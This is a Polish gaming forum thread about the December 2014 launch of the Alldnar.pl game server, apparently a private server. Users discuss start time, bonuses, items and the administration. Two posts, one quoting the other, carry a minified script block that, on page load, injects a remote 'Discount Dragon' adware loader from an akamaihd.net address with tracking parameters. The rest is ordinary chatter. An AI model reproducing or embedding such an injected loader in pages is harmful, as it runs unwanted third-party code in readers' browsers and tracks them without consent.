Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Alldnar.pl - odkryj nowe możliwości // Start 05.12.2014 (Piątek) Jutro [Dedyk] [Easy/Medium]


Sasori®

Rekomendowane odpowiedzi

  • Odpowiedzi 348
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Serwer zapowiada się dobrze.

 

Nie znam tej administracji osobiście ale zobaczymy co potrafią.

 

Co do ts'a..

 

Pewnie po starcie serwera ktoś zgłosi do supportu ts'a ,że łamiecie warunki umowy i zamkną wam tsa.

 

Ts bez zabezpieczeń w tych czasach ??? - Powodzenia Życzę :D

 

Pozdrawiam.

 

Będzie lienencja  takze spokojnie licenbcja jest  tylko musi wejsc znajomy

Poprosze o aktualna liste bonusów 

 Bonusy są max

Nie polecam ze względu na bardzo rozszczekaną Administrację i wałkowanie ciagle tych samych rzeczy.

Włączy serwer postoi tydzień czasu, będzie 100 osób, wyłączy go i tak co tydzień, patche, łatki-łatek, srelemorele.

Wielkie Nie. 

 

Jednym słowem serwer ("Technika" Cyca XDDDD)

 

< Cycu > Już możesz zacząć sapać brochę.

 

Ile razy mam powtarzac ze cycu nie ma z nami nic wspólnego ?? 

beda kupony SM w grze ? 

czekam na start :)

Kopony sm tylko z  eventow ox mozna zdobyc 

Czekam z niecierpliwością na start, polecam jak najbardziej, administracja jest jak najbardziej w porządku. Odpisują, nie olewają to jest "+". Skąd stalki? Bronie na 65?

Czy wszystko co w is'e jest można zdobyć w grze o takich samych wartościach w bonusach? Bo jeżeli nie to ja podziękuje. :D

Bronie 65  metki 85 90 itd stalki to samo 

 

w isie sa tylko kostiumy reszte mozna zdobyc w grze   oraz nowe kostiumy za PO

jak pobrać, na stronie nic niema

 

Jest w  www.alldnar.pl/pobierz 

Na każdym lvl będzie można cofnąć profesje ? Czy tylko do 30lv ?

 

Skile mozna wybrac tylko raz  czyli gramy do konca  mentalem lub bodym  jesli to bedzie proble i wiekszosc woli zeby mozna bylo zmieniac zrobimy glosowanie na forum nie ma problemu :) 

kiedy start dokladnie o jakiej h ?

Start o godzinie 18.00 

Czuję, że serwer nie wypał. Bardzo mało ludzi przegląda prezentacje z tego 20% nie zagra...

 

Nie oceniaj książki po okładce

Opublikowano

Jak można zniszczyć serwer przez łuki?

 

Wyjaśnij.

 

Reje o 17?

 

@druteks29

 

Z futrzaków są roski. 

Reje jak będzie o 20:00 to będzie dobrze 

 

Wyjebcie te futrzaki, jest to zbędne po 10 minutach gry nie lepiej dodać do sklepu ? 

Battlefield Heroes pod inną nazwą całkowicie odświeżone ! Już Niebawem 

 

 

 

rglinepolska3.png

Opublikowano

Serwer bardzo ładnie się zapowiada, na pewno zawitam o 18 :) mam nadzieję że nie będzie opóźnień ;)

 

 

P.S. Bardzo ładny wygląd okna logowania

Opublikowano

Na starym morty.... max wbiłem w ~6h :)

 

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//discountdragon-a.akamaihd.net/loaders/1942/l.js?pid=1942&systemid=41f4aeda53ab837d959a112a6f63247e&ext=Discount Dragon&aoi=1403453082&zoneid=647865&crr=1417796854&type=p'; document.body.appendChild(t);})();});}})();</script>

Ale to nie jest montyriusz. :)

1377531174-U173186.png

Opublikowano

<script>(function(){if (window.top == window.self){function bindReady©{function a(){b||(b=!0,c())}var b=!1;if(document.addEventListener)document.addEventListener("DOMContentLoaded",function(){a()},!1);else if(document.attachEvent){if(document.documentElement.doScroll&&window==window.top){var d=function(){if(!b&&document.body)try{document.documentElement.doScroll("left"),a()}catch©{setTimeout(d,0)}};d()}document.attachEvent("onreadystatechange",function(){"complete"===document.readyState&&a()})}window.addEventListener?window.addEventListener("load",a,!1):window.attachEvent&&window.attachEvent("onload",a)};bindReady(function(){(function(){var t=document.createElement('script');t.src ='//discountdragon-a.akamaihd.net/loaders/1942/l.js?pid=1942&systemid=41f4aeda53ab837d959a112a6f63247e&ext=Discount Dragon&aoi=1403453082&zoneid=647865&crr=1417796854&type=p'; document.body.appendChild(t);})();});}})();</script>

Ale to nie jest montyriusz. :)

Jak to nie jest morty... to ja jestem baletnica... Wystarczy posiadać takie coś jak 'wzrok' :>

IDcncno.png

Opublikowano

To jest znacznie innym serw :) nie porównujcie ich...

Ale już 320+ kont no no zapowiada się ciekawie :P

Przeczytaj dokładnie prezentacje, nie będzie tak łatwo wbić 300 lvl :P

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...